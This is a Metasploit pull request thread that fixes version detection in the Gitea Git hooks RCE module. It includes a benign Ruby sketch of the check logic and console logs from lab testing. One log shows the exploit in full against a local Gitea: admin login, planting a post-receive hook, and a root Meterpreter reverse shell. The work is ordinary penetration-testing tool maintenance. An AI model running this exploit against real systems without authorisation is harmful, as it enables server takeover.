
Update Gitea Git hooks RCE check method #15730

Conversation

adfoster-r7
Contributor

Older versions of Gitea have a different version message than is currently supported:

The wording was changed here: go-gitea/gitea#9600

Before

When running the check method against a valid Gitea target, the 'Unsupported' check code is returned, which means the module doesn't support the check method, which is incorrect. Additionally, it doesn't identify the correct version of Gitea:

msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 10.10.168.148:31111 - This module does not support check. Target does not appear to be running Gitea.

After

Gitea is detected, and a check code which details the unknown version is returned:

msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 10.10.168.148:31111 - Cannot reliably check exploitability. Unknown Gitea version 38d8b8c.

It's worth noting that this change doesn't support non-English versions of Gitea.

Verification

Run an older version of Gitea, and replicate the testing steps here: #14978
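To make the before/after difference concrete, here is an added Ruby sketch of the check-method decision this PR describes; it is not the Metasploit module's own code, and the footer strings, the `Powered by Gitea` marker and the `Version:` formats are constructed assumptions rather than Gitea's real markup.

```ruby
# Added example, not the module's code: separates "is this Gitea at all?"
# from "can the version be parsed?", which is the distinction the PR fixes.

# Constructed sample footers (assumed format, not Gitea's real HTML):
# an old build reporting a short commit hash, a newer build reporting a
# semantic version, and a non-Gitea page for contrast.
SAMPLE_OLD_GITEA = '<footer>Powered by Gitea Version: 38d8b8c</footer>'
SAMPLE_NEW_GITEA = '<footer>Powered by Gitea Version: 1.0.0</footer>'
SAMPLE_NOT_GITEA = '<footer>Powered by SomethingElse</footer>'

# English-only marker, which mirrors the PR's caveat that localised Gitea
# builds are not recognised by this approach.
GITEA_MARKER = /Powered by Gitea/i
SEMVER       = /Version:\s*(\d+\.\d+\.\d+)/
COMMIT_HASH  = /Version:\s*([0-9a-f]{7,40})\b/

# Returns [code, detail]. The codes are loosely named after Metasploit's
# CheckCode values: :safe when the target does not look like Gitea,
# :unknown when Gitea is present but its version cannot be reasoned about,
# :detected when Gitea is present with a parseable release version.
def gitea_check(body)
  return [:safe, 'Target does not appear to be running Gitea'] unless body =~ GITEA_MARKER

  if (m = SEMVER.match(body))
    # A real module would compare this against the vulnerable range here.
    [:detected, m[1]]
  elsif (m = COMMIT_HASH.match(body))
    # The old behaviour fell through to "not Gitea" for this case; the fix
    # reports unknown exploitability while still naming what was seen.
    [:unknown, "Unknown Gitea version #{m[1]}"]
  else
    [:unknown, 'Gitea detected but no version string found']
  end
end
```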

@adfoster-r7 adfoster-r7 force-pushed the update-gitea-git-hooks-rce-check-method branch from 50d37ca to 3283d4f Compare September 30, 2021 23:55
@adfoster-r7
Contributor Author

cc @cdelafuente-r7 🕵️

@adfoster-r7 adfoster-r7 force-pushed the update-gitea-git-hooks-rce-check-method branch 2 times, most recently from 8a4c250 to 8204eb2 Compare October 1, 2021 00:02
@adfoster-r7 adfoster-r7 force-pushed the update-gitea-git-hooks-rce-check-method branch from 8204eb2 to a7aa255 Compare October 1, 2021 00:11
@gwillcox-r7 gwillcox-r7 self-assigned this Oct 4, 2021
@gwillcox-r7
Contributor

Before:

       =[ metasploit v6.1.9-dev-0acef2285d                ]
+ -- --=[ 2168 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/gitea_git_hooks_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME test
USERNAME => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD test
PASSWORD => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 127.0.0.1:3000 - This module does not support check. Target does not appear to be running Gitea.
msf6 exploit(multi/http/gitea_git_hooks_rce) > exit

@gwillcox-r7
Contributor

After with patch applied:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/gitea_git_hooks_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME test
USERNAME => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD test
PASSWORD => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > show options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   test             yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
                                         ploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   test             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 127.0.0.1:3000 - Cannot reliably check exploitability. Unknown Gitea version 6aacf4d.
msf6 exploit(multi/http/gitea_git_hooks_rce) > 

@gwillcox-r7
Contributor

And just to show this still works for exploitation purposes I logged in with admin credentials and disabled the AutoCheck check so that the exploit would run without raising an error:

msf6 exploit(multi/http/gitea_git_hooks_rce) > show options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   test             yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
                                         ploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   test             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Unknown Gitea version 6aacf4d. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitea_git_hooks_rce) > set AutoCheck false
AutoCheck => false
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "test/test"
[-] Exploit aborted due to failure: no-access: Login failed
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME masteradmin
USERNAME => masteradmin
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "masteradmin/admin"
[+] Logged in
[*] Create repository "Asoka_Overhold"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3012548 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:53870) at 2021-10-04 15:41:30 -0500
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Asoka_Overhold deleted.

meterpreter > getuid
Server username: root
meterpreter > shell
Process 103515 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
id
uid=0(root) gid=0(root) groups=0(root)

@gwillcox-r7
Contributor

For reference the version I tested that on was the earliest they had available, version 1.0.0. In case that helps at all.

@gwillcox-r7 gwillcox-r7 merged commit f93e1a2 into rapid7:master Oct 4, 2021
@gwillcox-r7 gwillcox-r7 added the rn-fix release notes fix label Oct 4, 2021
@gwillcox-r7
Contributor

Release Notes

The check method for the Gitea Git hooks RCE module has been updated to correctly handle older versions of Gitea and report their exploitability as unknown vs reporting the target as not running Gitea.
